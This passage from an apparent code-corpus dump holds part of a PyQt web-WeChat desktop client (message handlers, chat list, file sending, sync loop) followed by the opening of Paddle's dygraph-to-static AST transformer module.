def chat_item_clicked(self):
if self.chatAreaWidget.isHidden():
self.chatAreaWidget.setVisible(True)
self.label.setVisible(False)
if self.current_chat_contact:
self.messages_clear()
current_row = self.chatsWidget.currentIndex().row()
user_name_cell_index = self.chatsModel.index(current_row,0)
user_name_cell = self.chatsModel.data(user_name_cell_index)
tip_index = self.chatsModel.index(current_row,3)
tips_item = self.chatsModel.data(tip_index)
if tips_item:
self.chatsModel.setData(tip_index, "")
head_tips_index = self.chatsModel.index(current_row,0)
tips_item = self.chatsModel.data(head_tips_index)
#if message_count:
# count = int(message_count)
#TODO
user_name = user_name_cell
print("current click user is %s"%user_name)
if self.isChatRoom(user_name):
contact = self.get_member(user_name)
else:
contact = self.get_contact(user_name)
self.current_chat_contact = contact
dn = contact['DisplayName'] or contact['RemarkName'] or contact['NickName']
#if not dn:
# dn = contact['NickName']
if self.isChatRoom(user_name):
self.currentChatUser.setText(("%s (%d)")%(wechatutil.unicode(dn),contact["MemberCount"]))
else:
self.currentChatUser.setText(wechatutil.unicode(dn))
#self.messages_clear()
#self.messages.setText('')
self.draft.setText('')
cached_messages = self.messages_pool.get(user_name) or []
#for (key,messages_list) in self.msg_cache.items():
#for (key,messages_list) in msgss:
#if user_name == key:
for message in cached_messages:
msg_type = message['MsgType']
if msg_type:
if msg_type == 2 or msg_type == 51 or msg_type == 52:
continue
if msg_type == 1:
self.text_msg_handler(message)
elif msg_type == 3:
self.image_msg_handler(message)
elif msg_type == 34:
self.voice_msg_handler(message)
elif msg_type == 49:
self.app_msg_handler(message)
elif msg_type == 10002:
self.sys_msg_handler(message)
elif msg_type == 10000:
self.default_msg_handler(message)
else:
self.default_msg_handler(message)
#break
def showMembers(self):
self.current_chat_user_click()
def current_chat_user_click(self):
memebers = [self.current_chat_contact]
if self.current_chat_contact['UserName'].find('@@') >= 0:
memebers = self.current_chat_contact["MemberList"]
if self.memberListWidget:
#print("visible ddd%s:"+str(self.memberListWidget.isHidden()))
if self.memberListWidget.isHidden():
rect = self.geometry()
#update memberlist
self.memberListWidget.updatemembers(memebers)
self.memberListWidget.resize(QSize(MemberListWidget.WIDTH,rect.height()+self.frameGeometry().height()-self.geometry().height()))
self.memberListWidget.move(self.frameGeometry().x()+self.frameGeometry().width(), self.frameGeometry().y())
self.memberListWidget.show()
else:
self.memberListWidget.hide()
else:
rect = self.geometry()
print(rect.left(), rect.top())
print(self.frameGeometry())
print(rect.width(), rect.height())
self.memberListWidget = MemberListWidget(memebers,self.wechatweb.getFriends(),self)
self.memberListWidget.resize(QSize(MemberListWidget.WIDTH,rect.height()+self.frameGeometry().height()-self.geometry().height()))
self.memberListWidget.move(self.frameGeometry().x()+self.frameGeometry().width(), self.frameGeometry().y())
self.memberListWidget.membersChanged.connect(self.getSelectedUsers)
self.memberListWidget.show()
def member_item_clicked(self):
self.profileWidget.setVisible(True)
self.chatAreaWidget.setVisible(False)
self.label.setVisible(False)
current_row =self.friendsWidget.currentIndex().row()
user_name_index = self.friendsModel.index(current_row,0)
user_name_o = self.friendsModel.data(user_name_index)
'''python2
user_name = user_name_o.toString()
'''
user_name = user_name_o
contact = self.get_member(user_name)
self.user_name_label.setVisible(False)
self.user_name_label.setText(user_name)
if contact:
#user_icon = self.config.getContactHeadHome() + contact['UserName'] + ".jpg"
user_icon = "%s\\%s.jpg"%(self.config.customFace, contact['UserName'])
user_head_image = QtGui.QImage()
if user_head_image.load(user_icon):
self.avater_label.setPixmap(QtGui.QPixmap.fromImage(user_head_image).scaled(132, 132))
else:
if user_head_image.load(self.config.getDefaultIcon()):
self.avater_label.setPixmap(QtGui.QPixmap.fromImage(user_head_image).scaled(132, 132))
self.nickname_label.setText(wechatutil.unicode(contact['NickName']))
print(contact['Signature'])
if 'Signature' in contact:
print(contact['Signature'])
self.signature_label.setText(wechatutil.unicode(contact['Signature']) if ('Signature' in contact) else "")
self.remark_label.setText(wechatutil.unicode(contact['RemarkName']))
self.province_label.setText(wechatutil.unicode(contact['RemarkName']))
'''
self.current_chat_contact = contact
dn = contact['RemarkName'] or contact['NickName']
if not dn:
dn = contact['NickName']
self.currentChatUser.setText(wechatutil.unicode(dn))
self.messages.setText('')
if self.msg_cache.has_key(user_name):
messages_list = self.msg_cache[user_name]
for message in messages_list:
self.messages.append((message))
'''
def make_message(self,user_name,msg_body):
'''MSG TEMPLATE
{
id:'',
user:{
head_class='',
head_img = '<img src=xx.jpg/>'
},
body:{
content_class:'',
content:''
}
}
'''
"""
_msg =
{
id:'%s',
user:{
head_class='%s',
head_img = '%s'
},
body:{
content_class:'%s',
content:'%s'
}
} %(
'1',
("divMyHead" if self.wechatweb.user["UserName"] == user_name else "divotherhead"),
"<img src=%s.jpg/>"%(self.config.getContactHeadHome() + user_name),
("triangle-right right" if self.wechatweb.user["UserName"] == user_name else "triangle-left left"),
wechatutil.unicode(msg_body)
)
"""
user = self.wechatweb.getUser()
_msg = {}
_msg['id'] = ""
_user = {}
_user['head_class']=("divMyHead" if user["UserName"] == user_name else "divotherhead")
_user['head_img']="%s\\%s.jpg"%(self.config.customFace + user_name)
_msg['user']=_user
_body = {}
_body['content_class']= ("triangle-right right" if user["UserName"] == user_name else "triangle-left left")
_body['content'] = wechatutil.unicode(msg_body)
_msg['body']=_body
return _msg
def send_msg(self):
'''
#把消息發送出去
'''
msg_html = self.draft.toHtml()
rr = re.search(r'<img src="([.*\S]*\.gif)"',msg_html,re.I)
msg_body = ""
if rr:
pimages = self.code_emotion(msg_html)
for pimage in pimages:
p = pimage["p"]
msg_body+=p
else:
msg_body = self.draft.toPlainText()
#print("xxxx %s"%msgBody)
#msg_text = str(self.draft.toPlainText())
if not msg_body or len(msg_body) <= 0:
return
msg_body = wechatutil.unicode(msg_body)
msg = Msg(1, msg_body, self.current_chat_contact['UserName'])
response = self.wechatweb.webwx_send_msg(msg)
if not response or response is False:
return False
#if send success
self.stick(select=True)
#self.chatsWidget.selectRow(0)
format_msg = self.msg_timestamp(self.wechatweb.getUser()['NickName'])
#self.messages.page().mainFrame().evaluateJavaScript("append('%s');"%msgBody)
#TODO append msg
self.messages.append(format_msg)
msg_body = msg_body.replace("'", "\'")
msg_body = msg_body.replace('"', '\"')
msg_decode_body = self.decode_emotion(msg_body) if rr else msg_body
msg_text = self.decode_emotion(msg_decode_body)
self.messages.append(wechatutil.unicode(msg_decode_body))
_msg = self.make_message(self.current_chat_contact['UserName'],msg_decode_body)
#script = "nappend('%s','%s','%s','%s','%s');"%(_msg['id'],_msg['user']['head_class'],_msg['user']['head_img'],_msg['body']['content_class'],_msg['body']['content'])
#print(script)
#self.messages.page().mainFrame().evaluateJavaScript(script)
self.draft.setText('')
#TODO FIX BUG
if False:
row_count = self.chatsModel.rowCount()
find = False
for row_number in range(row_count):
user_name_index = self.chatsModel.index(row_number,0)
user_name_obj = self.chatsModel.data(user_name_index)
user_name = user_name_obj.toString()
if user_name and user_name == self.current_chat_contact['UserName']:
find = True
tip_index = self.chatsModel.index(row_number,3)
tips_count_obj = self.chatsModel.data(tip_index)
if tips_count_obj:
tips_count = tips_count_obj.toInt()
if tips_count:
count = tips_count[0]
self.chatsModel.setData(tip_index, "%d"%(count+1))
else:
self.chatsModel.setData(tip_index, "1")
else:
count_tips_item = QtGui.QStandardItem("1")
self.chatsModel.setItem(row_number, 3, count_tips_item)
#提昇from_user_name在會話列表中的位置
#move this row to the top of the sessions
taked_row = self.chatsModel.takeRow(row_number)
self.chatsModel.insertRow(0 ,taked_row)
break;
if find == False:
cells = []
# user name item
user_name_item = QtGui.QStandardItem((user_name))
cells.append(user_name_item)
item = QtGui.QStandardItem(QIcon("resource/icons/hicolor/32x32/apps/wechat.png"),"")
cells.append(item)
dn = self.current_chat_contact['RemarkName'] or self.current_chat_contact['NickName']
#if not dn:
#dn = self.current_chat_contact['NickName']
# user remark or nick name
remark_nick_name_item = QtGui.QStandardItem((dn))
cells.append(remark_nick_name_item)
count_tips_item = QtGui.QStandardItem("1")
cells.append(count_tips_item)
self.chatsModel.insertRow(0,cells)
def upload_send_msg_image(self,contact,ffile):
'''
#把圖片發送出去
'''
upload_response = self.wechatweb.webwx_upload_media(contact,ffile)
json_upload_response = json.loads(upload_response)
media_id = json_upload_response['MediaId']
if self.isImage(ffile):
msg = Msg(3, str(media_id), self.current_chat_contact['UserName'])
send_response = self.wechatweb.webwx_send_msg_img(msg)
else:
#parameter: appid,title,type=6,totallen,attachid(mediaid),fileext
fileext = os.path.splitext(ffile)[1]
if fileext and len(fileext) > 1 and fileext.startswith("."):
fileext = fileext[1:(len(fileext))]
content = "<appmsg appid='wxeb7ec651dd0aefa9' sdkver=''><title>%s</title><des></des><action></action><type>6</type><content></content><url></url><lowurl></lowurl><appattach><totallen>%d</totallen><attachid>%s</attachid><fileext>%s</fileext></appattach><extinfo></extinfo></appmsg>"%(os.path.basename(ffile),os.path.getsize(ffile),media_id,fileext)
msg = Msg(6, content, self.current_chat_contact['UserName'])
send_response = self.wechatweb.webwx_send_app_msg(msg)
return send_response
def stick(self,row=None,select=False):
'''
:param row the row which will be move to the top of the chat contact list
:select 是否要選中row指定的行
'''
#提昇from_user_name在會話列表中的位置
#move this row to the top of the session table
#從chat_contact列表中找人
if not row or row <= 0:
row_count = self.chatsModel.rowCount()
for _row in range(row_count):
index = self.chatsModel.index(_row,0)
user_name_o = self.chatsModel.data(index)
''' Python2
user_name = user_name_o.toString()
'''
user_name = user_name_o
if user_name and user_name == self.current_chat_contact["UserName"]:
row = _row
break;
if row == 0:
return True
elif row >= 1:
taked_row = self.chatsModel.takeRow(row)
self.chatsModel.insertRow(0 ,taked_row)
if select:
self.chatsWidget.selectRow(0)
return True
else:
return False
def over_the_top(self):
'''
:see stick
'''
sticked = self.stick(select=True)
if not sticked:
user = self.get_contact(self.current_chat_contact["UserName"])
self.append_chat_contact(user,action="INSERT",row=0)
self.chatsWidget.selectRow(0)
def isChatRoom(self,user):
'''
:parameter user.the id of user
'''
if user:
return user.startswith('@@')
else:
return False
def get_user_display_name(self,message):
'''
:获取用户的显示名称,如果是群,则显示成员的名称
'''
from_user_name = message['FromUserName']
user = self.wechatweb.getUser()
#如果和當前登陸人是同一個人
if from_user_name == user["UserName"]:
from_user = user
else:
from_user = self.get_contact(from_user_name)
from_user_display_name = from_member_name= None
#如果為群,則消息來源顯示from_member_name
#如果是群消息
if self.isChatRoom(from_user_name):
content = message['Content']
contents = content.split(":<br/>")
from_user_display_name = from_member_name = contents[0]
members = from_user["MemberList"]
for member in members:
if from_member_name == member['UserName']:
from_user_display_name = member['NickName'] or member['DisplayName'] or from_member_name
break
else:
from_user_display_name = from_user['RemarkName'] or from_user['NickName']
return from_user_display_name or from_user_name
def msg_timestamp(self,userName,createTime=None):
st = time.strftime("%Y-%m-%d %H:%M", time.localtime(createTime) if createTime else time.localtime())
msg_timestamp = ('%s %s') % (userName, st)
return wechatutil.unicode(msg_timestamp)
def default_msg_handler(self,msg):
'''
#默認的消息處理handler
'''
self.text_msg_handler(msg)
def wxinitial_msg_handler(self,message):
'''
#msg_type =51
#微信初化消息處理handler,
#我認為主要是初始化會話列表
#用返回的數据更新會話列表
'''
statusNotifyUserName = message["StatusNotifyUserName"]
#
#StatusNotifyCode = 2,4,5
#4:初始化時所有的會話列表人員信息
#2應該是新增會話,就是要把此人加入會話列表
#5還不清楚
#
statusNotifyCode = message["StatusNotifyCode"]
if statusNotifyUserName:
statusNotifyUserNames = statusNotifyUserName.split(",")
lists = []
for userName in statusNotifyUserNames:
exist = False
for tl in self.wechatweb.getChatContacts():
if userName == tl["UserName"]:
exist = True
break
if exist:
continue
if userName.startswith("@@"):
#prepare arguments for batch_get_contact api
group = {}
group['UserName'] = userName
group['ChatRoomId'] = ''
lists.append(group)
params = {
'Count': len(lists),
'List': lists
}
#update member list and download head image
#拉取聯天室成員列表
self.batch_get_contact(data=params)
logging.debug('statusNotifyCode:%s'%statusNotifyCode)
if statusNotifyCode == 4:
#update chat list
tmp_list = self.wechatweb.getChatContacts()[:]
for userName in statusNotifyUserNames:
exist = False
for tl in tmp_list:
if userName == tl["UserName"]:
exist = True
break
if exist:
continue
for member in self.wechatweb.getFriends():
if userName == member["UserName"]:
self.wechatweb.appendChatContact(member)
#self.append_contact_row(member,self.chatsModel)
break
else:
logging.warn('statusNotifyCode is %s not process'%statusNotifyCode)
def voice_msg_handler(self,msg):
'''
#把語音消息加入到聊天記錄裏
'''
if not self.current_chat_contact:
pass
from_user_display_name = self.get_user_display_name(msg)
format_msg = self.msg_timestamp(from_user_display_name,msg["CreateTime"])
'''
#:如果此消息的發件人和當前聊天的是同一個人,則把消息顯示在窗口中
'''
from_user_name = msg['FromUserName']
if from_user_name == self.wechatweb.getUser()['UserName']:
from_user_name = msg['ToUserName']
if self.current_chat_contact and from_user_name == self.current_chat_contact['UserName']:
self.messages.append(format_msg)
self.messages.append(wechatutil.unicode("請在手機端收聽語音"))
else:
pass
def video_msg_handler(self,msg):
'''
#把語音消息加入到聊天記錄裏
'''
if not self.current_chat_contact:
pass
from_user_display_name = self.get_user_display_name(msg)
format_msg = self.msg_timestamp(from_user_display_name,msg["CreateTime"])
'''
#如果此消息的發件人和當前聊天的是同一個人,則把消息顯示在窗口中
'''
from_user_name = msg['FromUserName']
if from_user_name == self.wechatweb.getUser()['UserName']:
from_user_name = msg['ToUserName']
if self.current_chat_contact and from_user_name == self.current_chat_contact['UserName']:
self.messages.append(format_msg)
self.messages.append(wechatutil.unicode("請在手機端觀看視頻"))
else:
pass
def text_msg_handler(self,message):
'''
#:把文本消息加入到聊天記錄裏
'''
if not self.current_chat_contact:
pass
from_user_display_name = self.get_user_display_name(message)
format_msg = self.msg_timestamp(from_user_display_name,message["CreateTime"])
'''
#:如果此消息的發件人和當前聊天的是同一個人,則把消息顯示在窗口中
'''
from_user_name = message['FromUserName']
if from_user_name == self.wechatweb.getUser()['UserName']:
from_user_name = message['ToUserName']
if self.current_chat_contact and from_user_name == self.current_chat_contact['UserName']:
content = message['Content']
if self.isChatRoom(from_user_name):
if content.startswith("@"):
contents = content.split(":<br/>")
content = contents[1]
msg_content = self.decode_emotion(content)
self.messages.append(format_msg)
self.messages.append(wechatutil.unicode(msg_content))
else:
pass
def download_msg_img(self,msg_id):
data = self.wechatweb.webwx_get_msg_img(msg_id)
if not data:
return False
img_cache_folder = ('%s/cache/img/'%(self.config.getAppHome()))
msg_img = img_cache_folder+msg_id+'.jpg'
with open(msg_img, 'wb') as image:
image.write(data)
return True
def image_msg_handler(self,message):
'''
#把文本消息加入到聊天記錄裏
'''
if not self.current_chat_contact:
pass
from_user_display_name = self.get_user_display_name(message)
format_msg = self.msg_timestamp(from_user_display_name,message["CreateTime"])
msg_id = message['MsgId']
self.wechatweb.webwx_get_msg_img(msg_id)
'''
#如果此消息的發件人和當前聊天的是同一個人,則把消息顯示在窗口中
'''
from_user_name = message['FromUserName']
if from_user_name == self.wechatweb.getUser()['UserName']:
from_user_name = message['ToUserName']
if self.current_chat_contact and from_user_name == self.current_chat_contact['UserName']:
self.messages.append(format_msg)
msg_img = ('<img src=%s/%s.jpg>'%(self.config.getCacheImageHome(),msg_id))
self.messages.append(msg_img)
else:
pass
def sys_msg_handler(self,msg):
'''
#系統消息處理
'''
if not self.current_chat_contact:
pass
from_user_display_name = self.get_user_display_name(msg)
format_msg = self.msg_timestamp(from_user_display_name,msg["CreateTime"])
xml_content = msg['Content']
if xml_content:
xml_content = xml_content.replace(">",">")
xml_content = xml_content.replace("<","<")
xml_content = xml_content.replace("<br/>","")
user_name = msg['FromUserName']
if user_name == self.wechatweb.getUser()['UserName']:
user_name = msg['ToUserName']
msg_type = msg['MsgType']
if msg_type == 10002:
user_name = msg["FromUserName"]
if self.isChatRoom(user_name):
xml_contents = xml_content.split(":<br/>")
xml_content = xml_contents[1]
doc = xml.dom.minidom.parseString(xml_content)
replacemsg_nodes = doc.getElementsByTagName("replacemsg")
#old_msgid
#TODO 用old msg id 從歷史中刪去
if replacemsg_nodes:
replacemsg = str(replacemsg_nodes[0].firstChild.data)
# 如果此消息的發件人和當前聊天的是同一個人,則把消息顯示在窗口中
if self.current_chat_contact and user_name == self.current_chat_contact['UserName']:
self.messages.append((("%s\r\n%s")%(format_msg,wechatutil.unicode(replacemsg))))
else:
pass
def app_msg_handler(self,msg):
'''把應用消息加入到聊天記錄裏,應該指的是由其他應用分享的消息
'''
if not self.current_chat_contact:
pass
xmlContent = msg['Content']
if xmlContent:
xmlContent = xmlContent.replace(">",">")
xmlContent = xmlContent.replace("<","<")
xmlContent = xmlContent.replace("<br/>","")
print("xmlContent %s"%xmlContent)
user_name = msg['FromUserName']
if user_name == self.wechatweb.getUser()['UserName']:
user_name = msg['ToUserName']
if self.isChatRoom(user_name):
index = xmlContent.find(":")
if index > 0:
xmlContent = xmlContent[index+1:len(xmlContent)]
#print("xml_content %s"%xmlContent)
doc = xml.dom.minidom.parseString(xmlContent)
title_nodes = doc.getElementsByTagName("title")
desc_nodes = doc.getElementsByTagName("des")
app_url_nodes = doc.getElementsByTagName("url")
title = ""
desc = ""
app_url = ""
if title_nodes and title_nodes[0] and title_nodes[0].firstChild:
title = title_nodes[0].firstChild.data
if desc_nodes and desc_nodes[0] and desc_nodes[0].firstChild:
desc = desc_nodes[0].firstChild.data
if app_url_nodes and app_url_nodes[0] and app_url_nodes[0].firstChild:
app_url = app_url_nodes[0].firstChild.data
from_user_display_name = self.get_user_display_name(msg)
format_msg = self.msg_timestamp(from_user_display_name,msg["CreateTime"])
'''
#如果此消息的發件人和當前聊天的是同一個人,則把消息顯示在窗口中
'''
if self.current_chat_contact and user_name == self.current_chat_contact['UserName']:
self.messages.append(format_msg)
self.messages.append(wechatutil.unicode(('%s %s %s')%(title,desc,app_url)))
else:
pass
def put_message_cache(self,cache_key,message):
'''
#用FromUserName做Key把消息存起來,同時把此人置頂
'''
msg_type = message['MsgType']
'''
if msg_type == 10002 or self.isChatRoom(cache_key):
cache_key = cache_key
else:
cache_key = message['FromUserName']
'''
row_count = self.chatsModel.rowCount()
if row_count <= 0:
self.blocked_messages_pool.append(message)
return False
if cache_key in self.messages_pool:
messages = self.messages_pool[cache_key]
else:
messages = []
messages.append(message)
self.messages_pool[cache_key] = messages
#TODO ADD TIPS
'''
#增加消息數量提示(提昇此人在會話列表中的位置)
'''
exist = False#此人是否在會話列表中
for row in range(row_count):
index = self.chatsModel.index(row,0)
user_name_o = self.chatsModel.data(index)
user_name = user_name_o
#user_name = self.chatsModel.item(i,0).text()
if user_name and user_name == cache_key:
exist = True
tip_index = self.chatsModel.index(row,3)
tips_count_obj = self.chatsModel.data(tip_index)
if tips_count_obj:
tips_count = tips_count_obj
if tips_count:
self.chatsModel.setData(tip_index, int(tips_count)+1)
else:
self.chatsModel.setData(tip_index, "1")
else:
count_tips_item = QtGui.QStandardItem("1")
self.chatsModel.setItem(row, 3, count_tips_item)
#提昇from_user_name在會話列表中的位置
#move this row to the top of the sessions
taked_row = self.chatsModel.takeRow(row)
self.chatsModel.insertRow(0 ,taked_row)
break;
#have not received a message before(如果此人没有在會話列表中,則加入之)
if not exist:
contact = {}
for member in self.wechatweb.getFriends():
if member['UserName'] == cache_key:
contact = member
break
if not contact:
logging.warn('the contact %s not found in friends'%cache_key)
return False
dn = contact['RemarkName'] or contact['NickName']
#if not dn:
#dn = contact['NickName']
user_name = contact['UserName']
cells = []
# user name item
user_name_item = QtGui.QStandardItem((user_name))
cells.append(user_name_item)
item = QtGui.QStandardItem(QIcon("resource/icons/hicolor/32x32/apps/wechat.png"),"")
cells.append(item)
# user remark or nick name
remark_nick_name_item = QtGui.QStandardItem((dn))
cells.append(remark_nick_name_item)
count_tips_item = QtGui.QStandardItem("1")
cells.append(count_tips_item)
self.chatsModel.insertRow(0,cells)
def msg_handle(self,message):
msg_type = message['MsgType']
if msg_type:
if msg_type == 51:
self.wxinitial_msg_handler(message)
return
if msg_type == 2 or msg_type == 52:
logging.warn('msg not process:')
logging.warn('msg type %d'%msg_type)
logging.warn('msg body %s'%message)
return
#
#
#
from_user_name = message['FromUserName']
if self.isChatRoom(from_user_name):
#user_name = from_user_name
from_user_name = message['FromUserName']
else:
#如果消息的發送者和登陸人一致,那麼上比消息有可能是通過其他設备發送,那麼有取ToUserName,才能顯示正确
if from_user_name == self.wechatweb.getUser()['UserName']:
from_user_name = message['ToUserName']
'''
#没有選擇和誰對話或者此消息的發送人和當前的對話人不一致,則把消息存放在message_cache中;
#如果此消息的發件人和當前聊天的是同一個人,則把消息顯示在窗口中
'''
if (not self.current_chat_contact) or from_user_name != self.current_chat_contact['UserName']:
self.put_message_cache(from_user_name,message)
else:
if msg_type == 1:
self.text_msg_handler(message)
elif msg_type == 3:
self.image_msg_handler(message)
elif msg_type == 34:
self.voice_msg_handler(message)
elif msg_type == 47:
self.default_msg_handler(message)
elif msg_type == 49:
self.app_msg_handler(message)
elif msg_type == 10002:
self.sys_msg_handler(message)
else:
self.default_msg_handler(message)
def select_emotion(self):
emotionWidget = Emotion(self)
cursor_point = QCursor.pos()
#emotionWidget.move(cursor_point)
emotionWidget.move(QPoint(cursor_point.x(),cursor_point.y()-Emotion.HEIGHT))
emotionWidget.selectChanged.connect(self.get_select_emotion)
emotionWidget.show()
'''
if QDialog.Accepted == emotionWidget.accept():
selected_emotion = emotionWidget.get_selected_emotion()
print("selected_emotion %s"%selected_emotion)
'''
def select_document(self):
fileDialog = QFileDialog(self)
if fileDialog.exec_():
selectedFiles = fileDialog.selectedFiles()
for ffile in selectedFiles:
ffile = str(ffile)
send_response = self.upload_send_msg_image(self.current_chat_contact,ffile)
send_response_dict = json.loads(send_response)
msg_id = send_response_dict["MsgID"]
#send success append the image to history;failed append to draft
if msg_id:
self.stick(select=True)
self.wechatweb.webwx_get_msg_img(msg_id)
#st = time.strftime("%Y-%m-%d %H:%M:%S ", time.localtime())
#format_msg = ('(%s) %s:') % (st, self.wechatweb.user['NickName'])
format_msg = self.msg_timestamp(self.wechatweb.getUser()['NickName'])
self.messages.append(format_msg)
if self.isImage(ffile):
msg_img = ('<img src=%s/%s.jpg>'%(self.config.getCacheImageHome(),msg_id))
else:
msg_img = ffile
self.messages.append(msg_img)
#_msg = self.make_message(self.wechatweb.getUser()['UserName'],wechatutil.unicode(msg_img))
#self.messages.page().mainFrame().evaluateJavaScript("append('%s');"%(json.dumps(_msg)))
#self.messages.page().mainFrame().evaluateJavaScript("append('%s');"%wechatutil.unicode(msg_img))
else:
#fileName=QtCore.QString.fromUtf8(fileName)
if self.isImage(ffile):
self.draft.append("<img src=%s width=80 height=80>"%(ffile))
else:
print(ffile)
def to_chat(self):
'''點擊傳消息按鈕
把此人加入Chat列表,同時顯示
'''
user_name = self.user_name_label.text()
print("to_chat user_name %s"%(user_name))
self.current_chat_contact = self.get_contact(user_name)
if self.current_chat_contact:
self.messages_clear()
self.switch_chat(show=True)
self.over_the_top()
def keyPressEvent(self,event):
print("keyPressEvent")
def synccheck(self,loop=True):
'''
:see webwx_sync_process
'''
while (True):
st = time.strftime("%Y-%m-%d %H:%M:%S ", time.localtime())
logging.debug('[push]synccheck %s' %(st))
try:
(code, selector) = self.wechatweb.sync_check()
except:
print("exception")
self.relogin()
if code == -1 and selector == -1:
logging.error("self.wechatweb.sync_check() error")
else:
if code != '0':
if code == '1101' and selector == '0':
logging.debug("session timeout")
self.relogin()
break
else:
if selector != '0':
sync_response = self.wechatweb.webwx_sync()
#print("WeChatSync.run#webwx_sync:")
if sync_response:
self.messageReceived.emit(sync_response)
#self.webwx_sync_process(sync_response)
if loop is False:
break
sleep(15)
``` |
{
"source": "0YuanZhang0/Paddle",
"score": 2
} |
#### File: dygraph/dygraph_to_static/ast_transformer.py
```python
from __future__ import print_function
import astor
import copy
# gast is a generic AST to represent Python2 and Python3's Abstract Syntax Tree(AST).
# It provides a compatibility layer between the AST of various Python versions,
# as produced by ast.parse from the standard ast module.
# See details in https://github.com/serge-sans-paille/gast/
import gast
import inspect
import textwrap
from paddle.fluid import unique_name
from paddle.fluid.dygraph.dygraph_to_static.break_continue_transformer import BreakContinueTransformer
from paddle.fluid.dygraph.dygraph_to_static.ifelse_transformer import IfElseTransformer
from paddle.fluid.dygraph.dygraph_to_static.list_transformer import ListTransformer
from paddle.fluid.dygraph.dygraph_to_static.loop_transformer import LoopTransformer
from paddle.fluid.dygraph.dygraph_to_static.tensor_shape_transformer import TensorShapeTransformer
from paddle.fluid.dygraph.dygraph_to_static.static_analysis import AstNodeWrapper
from paddle.fluid.dygraph.dygraph_to_static.static_analysis import NodeVarType
from paddle.fluid.dygraph.dygraph_to_static.static_analysis import StaticAnalysisVisitor
from paddle.fluid.dygraph.dygraph_to_static.utils import ast_to_func
from paddle.fluid.dygraph.dygraph_to_static.utils import is_paddle_api, is_dygraph_api, is_to_variable
from paddle.fluid.dygraph.dygraph_to_static.utils import to_assign_node, to_static_ast, update_args_of_func
from paddle.fluid.dygraph.dygraph_to_static.utils import dygraph_class_to_static_api
__all__ = ['DygraphToStaticAst', 'convert_to_static']
DECORATOR_NAMES = [
'dygraph_to_static_code', 'dygraph_to_static_program',
'dygraph_to_static_func', 'dygraph_to_static_output'
]
class DygraphToStaticAst(gast.NodeTransformer):
"""
Main class to transform Dygraph to Static Graph
"""
def get_static_ast(self, root):
# save root for some analysis may need global AST
self.root = root
self.static_analysis_visitor = StaticAnalysisVisitor(root)
self.static_analysis_root = self.static_analysis_visitor.get_node_wrapper_root(
)
self.decorate_func_name = None
self.arg_name_to_idx = {}
self.transfer_from_node_type(self.static_analysis_root)
return self.static_analysis_root
def transfer_from_node_type(self, node_wrapper):
# Generic transformation
self.visit(node_wrapper.node)
# Transform basic api of dygraph to static graph and get feed_name_to_arg_name
basic_api_trans = BasicApiTransformer(node_wrapper)
basic_api_trans.transform()
self.feed_name_to_arg_name = basic_api_trans.get_feed_name_to_arg_id()
# Transform Tensor.shape into fluid.layers.shape(Tensor)
TensorShapeTransformer(node_wrapper).transform()
# Transform list used in control flow
ListTransformer(node_wrapper).transform()
# Transform break/continue in loops
BreakContinueTransformer(node_wrapper).transform()
# Transform for loop and while loop
LoopTransformer(node_wrapper).transform()
# Transform all if/else statement of Dygraph into Static Graph.
IfElseTransformer(node_wrapper).transform()
def visit_FunctionDef(self, node):
if self.decorate_func_name is None:
self.decorate_func_name = node.name
for idx, arg in enumerate(node.args.args):
self.arg_name_to_idx[arg.id] = idx
self.generic_visit(node)
# Remove the decorated name of dygraph_to_static
if hasattr(node, 'decorator_list'):
decorator_list = [
d for d in node.decorator_list if d.id not in DECORATOR_NAMES
]
node.decorator_list = decorator_list
return node
def get_module_name(self):
"""
Return the main function name which will be used as module name
in ast_to_func.
"""
# Should consider BaseAPITransformer which add new module name in Yamei's PR.
assert self.decorate_func_name, "decorate_func_name shall not be None."
return self.decorate_func_name
def get_feed_name_to_idx(self):
feed_name_to_idx = {}
for feed_name, arg_name in self.feed_name_to_arg_name.items():
feed_name_to_idx[feed_name] = self.arg_name_to_idx.get(arg_name)
return feed_name_to_idx
class BasicApiTransformer(gast.NodeTransformer):
"""
Class to transform basic API from dygraph to static graph.
"""
def __init__(self, wrapper_root):
assert isinstance(
wrapper_root, AstNodeWrapper
), "Input non-AstNodeWrapper node for the initialization of BasicApiTransformer."
self.wrapper_root = wrapper_root
self.root = wrapper_root.node
self.class_node_dict = {}
# Used for transformation of data feed
self.feed_name_to_arg_id = {}
self.name_to_tensor_shape = {}
def transform(self):
self.visit(self.root)
return self.wrapper_root
def visit_FunctionDef(self, node):
self.generic_visit(node)
if hasattr(node, 'decorator_list'):
decorator_list = [
d for d in node.decorator_list if d.id not in DECORATOR_NAMES
]
node.decorator_list = decorator_list
return node
def visit_Assign(self, node):
if self._update_class_node_dict(node):
return None
for child_node in gast.walk(node.value):
if isinstance(child_node, gast.Call):
self._visit_Call(child_node)
return node
def visit_Expr(self, node):
value_node = node.value
for child_node in gast.walk(value_node):
if isinstance(child_node, gast.Call):
if is_dygraph_api(child_node):
return
else:
self._visit_Call(child_node)
return node
def _visit_Call(self, node):
assert isinstance(node, gast.Call)
# Replace API `to_variable` with `fluid.layers.assign`
if is_to_variable(node):
self._update_feed_dict(node)
node = to_assign_node(node)
return node
func_name = astor.to_source(gast.gast_to_ast(node.func))
if self._is_dygraph_forward(func_name):
class_node = self._get_class_node(func_name)
static_node = to_static_ast(node, class_node)
return static_node
else:
return node
def _is_dygraph_forward(self, func_id):
return func_id in self.class_node_dict
def _get_class_node(self, func_id):
return self.class_node_dict[func_id]
def _update_class_node_dict(self, node):
assert isinstance(node, gast.Assign)
node_value = node.value
if isinstance(node_value, gast.Call):
if is_to_variable(node_value):
return False
if is_dygraph_api(node_value):
dygraph_api = node_value.func.attr
if not dygraph_class_to_static_api.get(dygraph_api):
return False
update_args_of_func(node_value, node_value, "__init__")
target_str = astor.to_source(gast.gast_to_ast(node.targets[0]))
self.class_node_dict[target_str] = node_value
return True
# TODO: node.value is not dygraph class
return False
def _update_feed_dict(self, node):
assert isinstance(node, gast.Call)
value_node = None
for kw in node.keywords:
if kw.arg == 'value':
value_node = kw.value # eg: `a` for "value=a "
if not value_node:
value_node = node.args[0]
if not isinstance(value_node, gast.Name):
return
else:
var_name = value_node.id
feed_var_name = unique_name.generate(var_name) # eg: "a_0"
self.feed_name_to_arg_id[
feed_var_name] = var_name # eg: "a_0" : "a"
def get_feed_name_to_arg_id(self):
return self.feed_name_to_arg_id
def convert_to_static(dyfunc):
"""
Converts dygraph function into static function.
"""
# Get AST from dygraph function
raw_code = inspect.getsource(dyfunc)
code = textwrap.dedent(raw_code)
root = gast.parse(code)
# Transform AST
dygraph_to_static = DygraphToStaticAst()
root_wrapper = dygraph_to_static.get_static_ast(root)
